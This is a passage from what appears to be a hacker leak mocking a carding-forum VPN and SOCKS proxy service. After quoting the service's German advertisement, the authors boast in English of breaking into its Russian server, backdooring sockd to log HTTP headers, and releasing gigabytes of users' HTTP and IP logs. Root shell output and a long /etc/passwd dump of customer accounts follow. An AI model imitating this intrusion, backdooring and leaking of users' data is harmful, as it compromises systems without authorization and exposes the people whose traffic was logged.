|  Wir haben viele Erfahrungen gesammelt da der Service seit         |
|  22.12.2009 existiert und er ein offizielles Projekt vom carders.cc|
|  Team ist. Wir mieten nur Dedizierte Server bei Anbietern bei denen|
|  wir auch zu 100% sicher sind dass diese nicht mit der Polizei     |
|  kooperieren (deswegen bieten wir als Location erstmal nur Russland|
|  an, weitere Locations werden folgen). Außerdem sind die Server    |
|  2-fach verschlüsselt und wie schon erwähnt komplett Logfrei.      |
|____________________________________________________________________|

Alright. So we tapped into your russian VPN- and socksserver and  shat
brix when looking at your two-times encrypted server. What kind of mad
algorithm from the future are you using? No, lemme  guess,  AES-0?  On
top of that we unfortunately had to reduce the amount of "non-logging"
to  about  0%  when  backdooring  your  sockd  to  log   http-headers;
strangely, no AES-1337 here either. This gave us a  nice  round-up  of
the people using (and administrating) it and we can't  say  it  was  a
surprise. Therefore you find gigabytes  of  http-  and  IPlogs  neatly
packed and enclosed with the backup.

# uname -a
Linux vpnsocks 2.6.18-194.26.1.el5.028stab070.14 #1 SMP Thu Nov 18 16:34:01 MSK 2010 x86_64 GNU/Linux

# id
uid=0(root) gid=0(root)

# cat /etc/issue
Debian GNU/Linux 5.0 \n \l

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
bind:x:101:104::/var/cache/bind:/bin/false
fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
stunnel4:x:104:106::/var/run/stunnel4:/bin/false
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
USgK1k659d:x:1000:1000::/home/SSHUSER:/usr/sbin/nologin
vpn24socks:x:1004:1004::/home/vpn24socks:/bin/false
2ee2JLMeiD:x:1005:1005::/home/SSHUSER:/usr/sbin/nologin
jguv7VJ6ii:x:1010:1010::/home/SSHUSER:/usr/sbin/nologin
sOxNXOP2PV:x:1011:1011::/home/SSHUSER:/usr/sbin/nologin
IlE6hFCCQ9:x:1016:1016::/home/SSHUSER:/usr/sbin/nologin
gxCDRFriLl:x:1017:1017::/home/SSHUSER:/usr/sbin/nologin
BulLYDNolq:x:1018:1018::/home/SSHUSER:/usr/sbin/nologin
cEzN80h8BB:x:1020:1020::/home/SSHUSER:/usr/sbin/nologin
A49RKGrvdB:x:1021:1021::/home/SSHUSER:/usr/sbin/nologin
3uUk7DToWo:x:1022:1022::/home/SSHUSER:/usr/sbin/nologin
4MMRD3G8gT:x:1025:1025::/home/SSHUSER:/usr/sbin/nologin
QIhyvtXwum:x:1026:1026::/home/SSHUSER:/usr/sbin/nologin
bX8CG70Z8o:x:1027:1027::/home/SSHUSER:/usr/sbin/nologin
NGHZWVpVuu:x:1028:1028::/home/SSHUSER:/usr/sbin/nologin
MkdEe0NgXc:x:1029:1029::/home/SSHUSER:/usr/sbin/nologin
VP3ofYe5qa:x:1033:1033::/home/SSHUSER:/usr/sbin/nologin
s9wnq4iJbL:x:1035:1035::/home/SSHUSER:/usr/sbin/nologin
JF23IDOEX0:x:1037:1037::/home/SSHUSER:/usr/sbin/nologin
GOE9IvxCo8:x:1038:1038::/home/SSHUSER:/usr/sbin/nologin
2mAWybIfou:x:1039:1039::/home/SSHUSER:/usr/sbin/nologin
ywLRB9sQG5:x:1040:1040::/home/SSHUSER:/usr/sbin/nologin
U5wILkFczX:x:1043:1043::/home/SSHUSER:/usr/sbin/nologin
qU247MmWWp:x:1045:1045::/home/SSHUSER:/usr/sbin/nologin
JpE3P8WgBN:x:1047:1047::/home/SSHUSER:/usr/sbin/nologin
OTx2pkLemc:x:1048:1048::/home/SSHUSER:/usr/sbin/nologin
tLDp1920ug:x:1049:1049::/home/SSHUSER:/usr/sbin/nologin
pzSoTppzAu:x:1052:1052::/home/SSHUSER:/usr/sbin/nologin
fcz40nnjZr:x:1053:1053::/home/SSHUSER:/usr/sbin/nologin
1TEkAllzys:x:1054:1054::/home/SSHUSER:/usr/sbin/nologin
WMfvkEivY0:x:1055:1055::/home/SSHUSER:/usr/sbin/nologin
4Vvq0LAF9r:x:1059:1059::/home/SSHUSER:/usr/sbin/nologin
QVMgMXxSeK:x:1060:1060::/home/SSHUSER:/usr/sbin/nologin
dtxSHwZpH3:x:1061:1061::/home/SSHUSER:/usr/sbin/nologin
Uth54wPUPD:x:1062:1062::/home/SSHUSER:/usr/sbin/nologin
eCWEZEQZVq:x:1064:1064::/home/SSHUSER:/usr/sbin/nologin
wp6WkrrhkH:x:1065:1065::/home/SSHUSER:/usr/sbin/nologin
QLGAfXHUAX:x:1069:1069::/home/SSHUSER:/usr/sbin/nologin
NWPWWWxBnh:x:1070:1070::/home/SSHUSER:/usr/sbin/nologin
LY5yDIThxj:x:1071:1071::/home/SSHUSER:/usr/sbin/nologin
LvJSd7KRCq:x:1072:1072::/home/SSHUSER:/usr/sbin/nologin
DNlBW8cww2:x:1074:1074::/home/SSHUSER:/usr/sbin/nologin
22JAEReAWb:x:1075:1075::/home/SSHUSER:/usr/sbin/nologin
1U7iYfKkZg:x:1076:1076::/home/SSHUSER:/usr/sbin/nologin
A9RlGkkBly:x:1078:1078::/home/SSHUSER:/usr/sbin/nologin
ezjCz5tTLo:x:1080:1080::/home/SSHUSER:/usr/sbin/nologin
CZ298VrwyT:x:1084:1084::/home/SSHUSER:/usr/sbin/nologin
DDFFWPh13H:x:1085:1085::/home/SSHUSER:/usr/sbin/nologin
FwKPqLl9HO:x:1086:1086::/home/SSHUSER:/usr/sbin/nologin
4GA5FfwFEB:x:1090:1090::/home/SSHUSER:/usr/sbin/nologin
6RyUaunr8w:x:1091:1091::/home/SSHUSER:/usr/sbin/nologin
O2cPtoYJSA:x:1092:1092::/home/SSHUSER:/usr/sbin/nologin
OieOTeMsVT:x:1093:1093::/home/SSHUSER:/usr/sbin/nologin
nqh2PPsJoX:x:1094:1094::/home/SSHUSER:/usr/sbin/nologin
vLymjSZ2PC:x:1096:1096::/home/SSHUSER:/usr/sbin/nologin
BB22Ob0wRq:x:1097:1097::/home/SSHUSER:/usr/sbin/nologin
osHYLha9Xa:x:1100:1100::/home/SSHUSER:/usr/sbin/nologin
Mjs6t1fh7r:x:1102:1102::/home/SSHUSER:/usr/sbin/nologin
DEZtQQ9XlX:x:1104:1104::/home/SSHUSER:/usr/sbin/nologin
GIVQTfHrFc:x:1106:1106::/home/SSHUSER:/usr/sbin/nologin
6keWEVe8CF:x:1107:1107::/home/SSHUSER:/usr/sbin/nologin
f4rKlco33u:x:1109:1109::/home/SSHUSER:/usr/sbin/nologin
7iVUdiWpZI:x:1110:1110::/home/SSHUSER:/usr/sbin/nologin
WBuxr9t5xJ:x:1111:1111::/home/SSHUSER:/usr/sbin/nologin
9q9ZUnLTQd:x:1114:1114::/home/SSHUSER:/usr/sbin/nologin
Aw1GQfhx6F:x:1116:1116::/home/SSHUSER:/usr/sbin/nologin
uurtXDhjEU:x:1117:1117::/home/SSHUSER:/usr/sbin/nologin
G7lfd8zf1h:x:1119:1119::/home/SSHUSER:/usr/sbin/nologin
EMY6T7qTGu:x:1120:1120::/home/SSHUSER:/usr/sbin/nologin
IzPTVGc4Yo:x:1123:1123::/home/SSHUSER:/usr/sbin/nologin
4RmVWo7T4v:x:1126:1126::/home/SSHUSER:/usr/sbin/nologin
z9VTnI5JJX:x:1127:1127::/home/SSHUSER:/usr/sbin/nologin
qF7C1TR0he:x:1128:1128::/home/SSHUSER:/usr/sbin/nologin
OxUqFE7v5H:x:1130:1130::/home/SSHUSER:/usr/sbin/nologin
QluTWIEQSG:x:1131:1131::/home/SSHUSER:/usr/sbin/nologin
APi3yQS9Dt:x:1136:1136::/home/SSHUSER:/usr/sbin/nologin
KscYKlIxxP:x:1137:1137::/home/SSHUSER:/usr/sbin/nologin
4OrVVMvg5b:x:1138:1138::/home/SSHUSER:/usr/sbin/nologin
9q9wWck1iv:x:1139:1139::/home/SSHUSER:/usr/sbin/nologin
7T3MmDDuYA:x:1140:1140::/home/SSHUSER:/usr/sbin/nologin
9i3rSA1t3B:x:1141:1141::/home/SSHUSER:/usr/sbin/nologin
OG60AiIy32:x:1142:1142::/home/SSHUSER:/usr/sbin/nologin
XQlGb5EDEX:x:1143:1143::/home/SSHUSER:/usr/sbin/nologin
gSPbDrdVM7:x:1146:1146::/home/SSHUSER:/usr/sbin/nologin
bn1XjaAbBO:x:1148:1148::/home/SSHUSER:/usr/sbin/nologin
eEAGLP58B1:x:1149:1149::/home/SSHUSER:/usr/sbin/nologin
19vuUOl1DA:x:1151:1151::/home/SSHUSER:/usr/sbin/nologin
GJTBqAX0Po:x:1153:1153::/home/SSHUSER:/usr/sbin/nologin
YlKhbzOzlW:x:1155:1155::/home/SSHUSER:/usr/sbin/nologin
P1IEuRFxoc:x:1157:1157::/home/SSHUSER:/usr/sbin/nologin
M74tz0c6cB:x:1159:1159::/home/SSHUSER:/usr/sbin/nologin
pxCR5mWYxl:x:1160:1160::/home/SSHUSER:/usr/sbin/nologin
BYBEFkGPOv:x:1161:1161::/home/SSHUSER:/usr/sbin/nologin
bLQLndsfG7:x:1162:1162::/home/SSHUSER:/usr/sbin/nologin
7RsRZ2UUu4:x:1163:1163::/home/SSHUSER:/usr/sbin/nologin
gbWPMY3QUz:x:1164:1164::/home/SSHUSER:/usr/sbin/nologin
3DPSaYAK0I:x:1165:1165::/home/SSHUSER:/usr/sbin/nologin
Mfa9YHsFwm:x:1167:1167::/home/SSHUSER:/usr/sbin/nologin
MCdvro0waF:x:1168:1168::/home/SSHUSER:/usr/sbin/nologin
4qTipZxa3g:x:1169:1169::/home/SSHUSER:/usr/sbin/nologin
jzJtLApQhG:x:1174:1174::/home/SSHUSER:/usr/sbin/nologin
MfJ1grnWz2:x:1176:1176::/home/SSHUSER:/usr/sbin/nologin
TKTlaudWc6:x:1178:1178::/home/SSHUSER:/usr/sbin/nologin
Pg6UVUT4Zi:x:1179:1179::/home/SSHUSER:/usr/sbin/nologin
7KxfsATvUY:x:1180:1180::/home/SSHUSER:/usr/sbin/nologin
1YzAOqKyJU:x:1181:1181::/home/SSHUSER:/usr/sbin/nologin
ArAdFXiTdV:x:1182:1182::/home/SSHUSER:/usr/sbin/nologin
Tyt6Mxbjb9:x:1183:1183::/home/SSHUSER:/usr/sbin/nologin
p5TdBxcMOd:x:1185:1185::/home/SSHUSER:/usr/sbin/nologin
HCj78QJ6bB:x:1186:1186::/home/SSHUSER:/usr/sbin/nologin
ataiqUNkhi:x:1187:1187::/home/SSHUSER:/usr/sbin/nologin
BDnc11BaRR:x:1189:1189::/home/SSHUSER:/usr/sbin/nologin
0xs05pGnsc:x:1192:1192::/home/SSHUSER:/usr/sbin/nologin
6lCpT6Rtlb:x:1193:1193::/home/SSHUSER:/usr/sbin/nologin
MZGuvPmcQQ:x:1194:1194::/home/SSHUSER:/usr/sbin/nologin
S393KhVsS0:x:1195:1195::/home/SSHUSER:/usr/sbin/nologin
hePPBhA3Zb:x:1196:1196::/home/SSHUSER:/usr/sbin/nologin
xU33BmPZBt:x:1198:1198::/home/SSHUSER:/usr/sbin/nologin
8kTCqMWNer:x:1199:1199::/home/SSHUSER:/usr/sbin/nologin
Z9mwX94DwA:x:1203:1203::/home/SSHUSER:/usr/sbin/nologin
QE70dT7Sk6:x:1207:1207::/home/SSHUSER:/usr/sbin/nologin
3nRGuwyy3O:x:1208:1208::/home/SSHUSER:/usr/sbin/nologin
7lHu9x5ahz:x:1209:1209::/home/SSHUSER:/usr/sbin/nologin
yQt4twcYHi:x:1210:1210::/home/SSHUSER:/usr/sbin/nologin
5QOvATUZRp:x:1211:1211::/home/SSHUSER:/usr/sbin/nologin
qrIJmTNsip:x:1213:1213::/home/SSHUSER:/usr/sbin/nologin
3MD6MyTcBm:x:1214:1214::/home/SSHUSER:/usr/sbin/nologin
tX55vN8iBA:x:1216:1216::/home/SSHUSER:/usr/sbin/nologin
MUF31iM1WD:x:1218:1218::/home/SSHUSER:/usr/sbin/nologin
6I1FTys1aV:x:1219:1219::/home/SSHUSER:/usr/sbin/nologin
wH5nC1icK0:x:1222:1222::/home/SSHUSER:/usr/sbin/nologin
z9GYUjVR9T:x:1224:1224::/home/SSHUSER:/usr/sbin/nologin
uiv8RD7GCm:x:1225:1225::/home/SSHUSER:/usr/sbin/nologin
debug:x:1227:1227::/home/SSHUSER:/usr/sbin/nologin
udewQStk6R:x:1229:1229::/home/SSHUSER:/usr/sbin/nologin
YRfpne3P1W:x:1231:1231::/home/SSHUSER:/usr/sbin/nologin
2G6ixqigXX:x:1232:1232::/home/SSHUSER:/usr/sbin/nologin
FZ6nGPBlnq:x:1234:1234::/home/SSHUSER:/usr/sbin/nologin
N4WUxGoeHX:x:1235:1235::/home/SSHUSER:/usr/sbin/nologin
3qoY48h6od:x:1236:1236::/home/SSHUSER:/usr/sbin/nologin
0KltTgDdxs:x:1237:1237::/home/SSHUSER:/usr/sbin/nologin
KnOIZkAYhv:x:1239:1239::/home/SSHUSER:/usr/sbin/nologin
pduruQrvQw:x:1240:1240::/home/SSHUSER:/usr/sbin/nologin
gfPh6U7BSL:x:1244:1244::/home/SSHUSER:/usr/sbin/nologin
5d4PClWw9W:x:1246:1246::/home/SSHUSER:/usr/sbin/nologin
X3IwwuMhVn:x:1247:1247::/home/SSHUSER:/usr/sbin/nologin
9lKRF8UVul:x:1250:1250::/home/SSHUSER:/usr/sbin/nologin
7OEkZFXfrj:x:1251:1251::/home/SSHUSER:/usr/sbin/nologin
XR9kXMus18:x:1252:1252::/home/SSHUSER:/usr/sbin/nologin
LeJdtNDj0s:x:1253:1253::/home/SSHUSER:/usr/sbin/nologin
sMdDwKbykL:x:1255:1255::/home/SSHUSER:/usr/sbin/nologin
RLPQ9lCkkg:x:1257:1257::/home/SSHUSER:/usr/sbin/nologin
m07JSN8S1t:x:1258:1258::/home/SSHUSER:/usr/sbin/nologin
KoW5ucmliR:x:1259:1259::/home/SSHUSER:/usr/sbin/nologin
vxaNuWuV5A:x:1260:1260::/home/SSHUSER:/usr/sbin/nologin
r6cQANOWcM:x:1261:1261::/home/SSHUSER:/usr/sbin/nologin
GefhxHzMLB:x:1264:1264::/home/SSHUSER:/usr/sbin/nologin
gghzgxMlzK:x:1265:1265::/home/SSHUSER:/usr/sbin/nologin
dTECuvvcnY:x:1267:1267::/home/SSHUSER:/usr/sbin/nologin
teamsocks:x:1268:1268::/home/SSHUSER:/usr/sbin/nologin
2ZzW1TPwek:x:1273:1273::/home/SSHUSER:/usr/sbin/nologin
98pASZD7ZL:x:1274:1274::/home/SSHUSER:/usr/sbin/nologin
rgNCfMxMDE:x:1276:1276::/home/SSHUSER:/usr/sbin/nologin
TPJNO6U7gB:x:1278:1278::/home/SSHUSER:/usr/sbin/nologin
ZfQAMBcfd9:x:1280:1280::/home/SSHUSER:/usr/sbin/nologin
DWJLuNgRHq:x:1281:1281::/home/SSHUSER:/usr/sbin/nologin
26PWTAtsMQ:x:1282:1282::/home/SSHUSER:/usr/sbin/nologin
wiDxLyK5di:x:1283:1283::/home/SSHUSER:/usr/sbin/nologin
OOueJqB7Ux:x:1285:1285::/home/SSHUSER:/usr/sbin/nologin
EaDZkcpMhf:x:1286:1286::/home/SSHUSER:/usr/sbin/nologin
swj3AHcyct:x:1287:1287::/home/SSHUSER:/usr/sbin/nologin
tf1x5jgZf7:x:1289:1289::/home/SSHUSER:/usr/sbin/nologin
fTkJjFodJR:x:1290:1290::/home/SSHUSER:/usr/sbin/nologin
q8Ospeoqjm:x:1292:1292::/home/SSHUSER:/usr/sbin/nologin
atIdo8CMgl:x:1293:1293::/home/SSHUSER:/usr/sbin/nologin
AIVtIPpwbI:x:1294:1294::/home/SSHUSER:/usr/sbin/nologin
83ssqOi2mG:x:1295:1295::/home/SSHUSER:/usr/sbin/nologin
mDhIWzTPpL:x:1297:1297::/home/SSHUSER:/usr/sbin/nologin
aw1h0yzOXG:x:1300:1300::/home/SSHUSER:/usr/sbin/nologin
8aXdZvgEAL:x:1301:1301::/home/SSHUSER:/usr/sbin/nologin
7DpjZkkKRH:x:1303:1303::/home/SSHUSER:/usr/sbin/nologin
AA4KnP2gQo:x:1305:1305::/home/SSHUSER:/usr/sbin/nologin
OdJUE9NXz0:x:1306:1306::/home/SSHUSER:/usr/sbin/nologin
WRwA7CA595:x:1307:1307::/home/SSHUSER:/usr/sbin/nologin
UHJXsI3u7T:x:1309:1309::/home/SSHUSER:/usr/sbin/nologin
AfPMi3Orqx:x:1310:1310::/home/SSHUSER:/usr/sbin/nologin
IIpk9TW4Hy:x:1313:1313::/home/SSHUSER:/usr/sbin/nologin
GfXK6QYZvV:x:1314:1314::/home/SSHUSER:/usr/sbin/nologin
O2JLXab4Qb:x:1315:1315::/home/SSHUSER:/usr/sbin/nologin
abobJxNBqT:x:1317:1317::/home/SSHUSER:/usr/sbin/nologin
PAZYQvYMzp:x:1318:1318::/home/SSHUSER:/usr/sbin/nologin
mein:x:1322:1322::/home/SSHUSER:/usr/sbin/nologin
In1AVHseTI:x:1323:1323::/home/SSHUSER:/usr/sbin/nologin
1yNGl2LCqo:x:1324:1324::/home/SSHUSER:/usr/sbin/nologin
UcblLYHagd:x:1325:1325::/home/SSHUSER:/usr/sbin/nologin
GXFmqv0v6j:x:1327:1327::/home/SSHUSER:/usr/sbin/nologin
eb0MkURFMR:x:1328:1328::/home/SSHUSER:/usr/sbin/nologin
ZF0P5R5HY1:x:1329:1329::/home/SSHUSER:/usr/sbin/nologin
raiesY1Uya:x:1330:1330::/home/SSHUSER:/usr/sbin/nologin
6vWXOICD5H:x:1331:1331::/home/SSHUSER:/usr/sbin/nologin
EHgdxvxbz6:x:1332:1332::/home/SSHUSER:/usr/sbin/nologin
A9cAJOMNCY:x:1333:1333::/home/SSHUSER:/usr/sbin/nologin
tHx7Nh5Kfp:x:1335:1335::/home/SSHUSER:/usr/sbin/nologin
cvs7ZHnMch:x:1336:1336::/home/SSHUSER:/usr/sbin/nologin
R2XHmC62ZS:x:1337:1337::/home/SSHUSER:/usr/sbin/nologin
OthdQ1Nmh5:x:1338:1338::/home/SSHUSER:/usr/sbin/nologin
bhUizLPv0M:x:1339:1339::/home/SSHUSER:/usr/sbin/nologin
FqBNIU3BXX:x:1340:1340::/home/SSHUSER:/usr/sbin/nologin
cYuowtqfqp:x:1341:1341::/home/SSHUSER:/usr/sbin/nologin
ohLtOJoye9:x:1342:1342::/home/SSHUSER:/usr/sbin/nologin
0xlfaHuCkh:x:1343:1343::/home/SSHUSER:/usr/sbin/nologin
9oaRxjmjhy:x:1346:1346::/home/SSHUSER:/usr/sbin/nologin
8YNxD3ah6D:x:1347:1347::/home/SSHUSER:/usr/sbin/nologin
vd8oJtJgZr:x:1350:1350::/home/SSHUSER:/usr/sbin/nologin
NwIUjcCYZG:x:1351:1351::/home/SSHUSER:/usr/sbin/nologin
4nduuzyTQx:x:1352:1352::/home/SSHUSER:/usr/sbin/nologin
9qAqHLtLBx:x:1353:1353::/home/SSHUSER:/usr/sbin/nologin
tuy9erQgxJ:x:1354:1354::/home/SSHUSER:/usr/sbin/nologin
GMunVltQvi:x:1356:1356::/home/SSHUSER:/usr/sbin/nologin
sqYWjLaKXf:x:1357:1357::/home/SSHUSER:/usr/sbin/nologin
ymLHzXSVjD:x:1358:1358::/home/SSHUSER:/usr/sbin/nologin
cG6fOsmfgT:x:1359:1359::/home/SSHUSER:/usr/sbin/nologin
Xv02xz1TQc:x:1360:1360::/home/SSHUSER:/usr/sbin/nologin
13rRlbMsXc:x:1361:1361::/home/SSHUSER:/usr/sbin/nologin
o1NbEhdi1P:x:1362:1362::/home/SSHUSER:/usr/sbin/nologin
SvOn61Ck0K:x:1364:1364::/home/SSHUSER:/usr/sbin/nologin
LykwDkKp22:x:1365:1365::/home/SSHUSER:/usr/sbin/nologin
gDFHnIx6gq:x:1366:1366::/home/SSHUSER:/usr/sbin/nologin
BQBra5cl9R:x:1367:1367::/home/SSHUSER:/usr/sbin/nologin
4DaHNYAOXR:x:1368:1368::/home/SSHUSER:/usr/sbin/nologin
mybkiYHe4L:x:1369:1369::/home/SSHUSER:/usr/sbin/nologin
EZPpg2A55v:x:1370:1370::/home/SSHUSER:/usr/sbin/nologin
ZtLdtMOxjz:x:1371:1371::/home/SSHUSER:/usr/sbin/nologin
zyDY1v3Ifs:x:1372:1372::/home/SSHUSER:/usr/sbin/nologin
vk9rnSCr7X:x:1373:1373::/home/SSHUSER:/usr/sbin/nologin
nBeRUhO19Z:x:1374:1374::/home/SSHUSER:/usr/sbin/nologin
TeXbvEj3oJ:x:1375:1375::/home/SSHUSER:/usr/sbin/nologin
2Fr6Xq4WyM:x:1377:1377::/home/SSHUSER:/usr/sbin/nologin
yZsxPqnHdR:x:1378:1378::/home/SSHUSER:/usr/sbin/nologin
uQ4lOfB4g0:x:1379:1379::/home/SSHUSER:/usr/sbin/nologin
tMOYcIGsBO:x:1380:1380::/home/SSHUSER:/usr/sbin/nologin
rbcBkgkMCF:x:1381:1381::/home/SSHUSER:/usr/sbin/nologin
r0FjhxSADo:x:1382:1382::/home/SSHUSER:/usr/sbin/nologin
88rM31v2oJ:x:1383:1383::/home/SSHUSER:/usr/sbin/nologin
d3rdsSAt5s:x:1385:1385::/home/SSHUSER:/usr/sbin/nologin
frpOFX7CGJ:x:1386:1386::/home/SSHUSER:/usr/sbin/nologin
DN4SdAwDUX:x:1387:1387::/home/SSHUSER:/usr/sbin/nologin
SWsT6SYBW0:x:1388:1388::/home/SSHUSER:/usr/sbin/nologin
mqdlYki3Bu:x:1390:1390::/home/SSHUSER:/usr/sbin/nologin
Kf6hkNRFbt:x:1391:1391::/home/SSHUSER:/usr/sbin/nologin
VRKabwxsRz:x:1392:1392::/home/SSHUSER:/usr/sbin/nologin
W149pluZd9:x:1393:1393::/home/SSHUSER:/usr/sbin/nologin
UzPuS4CkgJ:x:1394:1394::/home/SSHUSER:/usr/sbin/nologin
UsGU5GLZmf:x:1395:1395::/home/SSHUSER:/usr/sbin/nologin
r4xLEdMjeu:x:1396:1396::/home/SSHUSER:/usr/sbin/nologin
lutZaKA8pP:x:1397:1397::/home/SSHUSER:/usr/sbin/nologin
usDgH6KNsm:x:1398:1398::/home/SSHUSER:/usr/sbin/nologin
CMSc3fnm0o:x:1399:1399::/home/SSHUSER:/usr/sbin/nologin
vYwuL6Uwia:x:1400:1400::/home/SSHUSER:/usr/sbin/nologin
yaSgVmndrd:x:1403:1403::/home/SSHUSER:/usr/sbin/nologin
dfvW2pna2L:x:1404:1404::/home/SSHUSER:/usr/sbin/nologin
ng3LKLliu1:x:1405:1405::/home/SSHUSER:/usr/sbin/nologin
8SVb2iLNbA:x:1406:1406::/home/SSHUSER:/usr/sbin/nologin
3aiHc3W1co:x:1407:1407::/home/SSHUSER:/usr/sbin/nologin
mON9q5Awho:x:1408:1408::/home/SSHUSER:/usr/sbin/nologin
FRXf5cUHNA:x:1409:1409::/home/SSHUSER:/usr/sbin/nologin
X2w1wWC8cc:x:1410:1410::/home/SSHUSER:/usr/sbin/nologin
KbZzI1EGD7:x:1411:1411::/home/SSHUSER:/usr/sbin/nologin
vwX6HwC8Lh:x:1412:1412::/home/SSHUSER:/usr/sbin/nologin
YbDmrQ3uHX:x:1413:1413::/home/SSHUSER:/usr/sbin/nologin
XwrlqzZcqt:x:1414:1414::/home/SSHUSER:/usr/sbin/nologin
Zr5u4mLaor:x:1415:1415::/home/SSHUSER:/usr/sbin/nologin
yRkX9kmf4d:x:1417:1417::/home/SSHUSER:/usr/sbin/nologin
VPPl3s7YUL:x:1418:1418::/home/SSHUSER:/usr/sbin/nologin
OTgrnEWUwc:x:1419:1419::/home/SSHUSER:/usr/sbin/nologin
G0OREuDm37:x:1420:1420::/home/SSHUSER:/usr/sbin/nologin
CQyjF4u7CS:x:1421:1421::/home/SSHUSER:/usr/sbin/nologin
XwU6xeJKMx:x:1422:1422::/home/SSHUSER:/usr/sbin/nologin
aklcI4G2Hr:x:1424:1424::/home/SSHUSER:/usr/sbin/nologin
mT7JPIqVuf:x:1425:1425::/home/SSHUSER:/usr/sbin/nologin
gsZxRf05sx:x:1426:1426::/home/SSHUSER:/usr/sbin/nologin
v716hX8oaW:x:1429:1429::/home/SSHUSER:/usr/sbin/nologin
Mmh3M4oP0v:x:1430:1430::/home/SSHUSER:/usr/sbin/nologin
ctV3NEzitO:x:1431:1431::/home/SSHUSER:/usr/sbin/nologin
wKer3VQNa8:x:1432:1432::/home/SSHUSER:/usr/sbin/nologin
76BuKJAIQs:x:1433:1433::/home/SSHUSER:/usr/sbin/nologin
k1dO6lfMNd:x:1434:1434::/home/SSHUSER:/usr/sbin/nologin
I6J3JHUqC1:x:1435:1435::/home/SSHUSER:/usr/sbin/nologin
GYoFHeDm0z:x:1436:1436::/home/SSHUSER:/usr/sbin/nologin
72YV5GHBVx:x:1438:1438::/home/SSHUSER:/usr/sbin/nologin
G71wfQEPoC:x:1439:1439::/home/SSHUSER:/usr/sbin/nologin
HgcCrXDKen:x:1440:1440::/home/SSHUSER:/usr/sbin/nologin
gbzSM7ywwW:x:1441:1441::/home/SSHUSER:/usr/sbin/nologin
dfJJwbDOaG:x:1442:1442::/home/SSHUSER:/usr/sbin/nologin
4Saf8LwCcR:x:1443:1443::/home/SSHUSER:/usr/sbin/nologin
1eeUWOlK9E:x:1444:1444::/home/SSHUSER:/usr/sbin/nologin
Cll4KDM0W3:x:1445:1445::/home/SSHUSER:/usr/sbin/nologin
OJAEWyDwCI:x:1446:1446::/home/SSHUSER:/usr/sbin/nologin
q1iyUEbI5V:x:1447:1447::/home/SSHUSER:/usr/sbin/nologin
2N1Uo47Mlg:x:1448:1448::/home/SSHUSER:/usr/sbin/nologin
ruVtSN24pr:x:1450:1450::/home/SSHUSER:/usr/sbin/nologin
zJltMD4mG9:x:1452:1452::/home/SSHUSER:/usr/sbin/nologin
WkUUS9RQf0:x:1454:1454::/home/SSHUSER:/usr/sbin/nologin
bWauNdcsMn:x:1455:1455::/home/SSHUSER:/usr/sbin/nologin
S5UKpRwg51:x:1456:1456::/home/SSHUSER:/usr/sbin/nologin
stFt5RwE33:x:1457:1457::/home/SSHUSER:/usr/sbin/nologin
OCUbNto6Bg:x:1458:1458::/home/SSHUSER:/usr/sbin/nologin
eIxatCSG1U:x:1459:1459::/home/SSHUSER:/usr/sbin/nologin
zXcXCYaIpo:x:1461:1461::/home/SSHUSER:/usr/sbin/nologin
RBNgJIRt49:x:1462:1462::/home/SSHUSER:/usr/sbin/nologin
niSxFcVo6S:x:1463:1463::/home/SSHUSER:/usr/sbin/nologin
Uxx9MvILLz:x:1464:1464::/home/SSHUSER:/usr/sbin/nologin
klYUlzI7cK:x:1465:1465::/home/SSHUSER:/usr/sbin/nologin
6m9Y1QaKr3:x:1466:1466::/home/SSHUSER:/usr/sbin/nologin
lVXZHCarqJ:x:1467:1467::/home/SSHUSER:/usr/sbin/nologin
4GWL9WXzxF:x:1468:1468::/home/SSHUSER:/usr/sbin/nologin
JxaTdAV8Rw:x:1469:1469::/home/SSHUSER:/usr/sbin/nologin
8P7jKJ2Nlh:x:1470:1470::/home/SSHUSER:/usr/sbin/nologin
vkE7Afv1aW:x:1471:1471::/home/SSHUSER:/usr/sbin/nologin
2Er5XcDGWA:x:1472:1472::/home/SSHUSER:/usr/sbin/nologin
qwBUev5nEp:x:1473:1473::/home/SSHUSER:/usr/sbin/nologin
muIspwxptl:x:1474:1474::/home/SSHUSER:/usr/sbin/nologin
e5yhvJdeTw:x:1475:1475::/home/SSHUSER:/usr/sbin/nologin
XUxzr4xMlT:x:1476:1476::/home/SSHUSER:/usr/sbin/nologin
va20H8Ol9R:x:1477:1477::/home/SSHUSER:/usr/sbin/nologin
qsAbm8ZMyg:x:1478:1478::/home/SSHUSER:/usr/sbin/nologin
9An1Ctk2Qa:x:1479:1479::/home/SSHUSER:/usr/sbin/nologin
Ey5cDS72xR:x:1480:1480::/home/SSHUSER:/usr/sbin/nologin
uCUqoIdGPa:x:1481:1481::/home/SSHUSER:/usr/sbin/nologin
N6fG120epq:x:1482:1482::/home/SSHUSER:/usr/sbin/nologin
gV0gXSFPQ8:x:1483:1483::/home/SSHUSER:/usr/sbin/nologin
FvxPhU3XUz:x:1484:1484::/home/SSHUSER:/usr/sbin/nologin
iYoWJEuIeo:x:1485:1485::/home/SSHUSER:/usr/sbin/nologin
ybLYgoCPNG:x:1486:1486::/home/SSHUSER:/usr/sbin/nologin
Z6pSiUldwy:x:1487:1487::/home/SSHUSER:/usr/sbin/nologin
TkRcTTkRSF:x:1488:1488::/home/SSHUSER:/usr/sbin/nologin
wHgs7nrMld:x:1489:1489::/home/SSHUSER:/usr/sbin/nologin
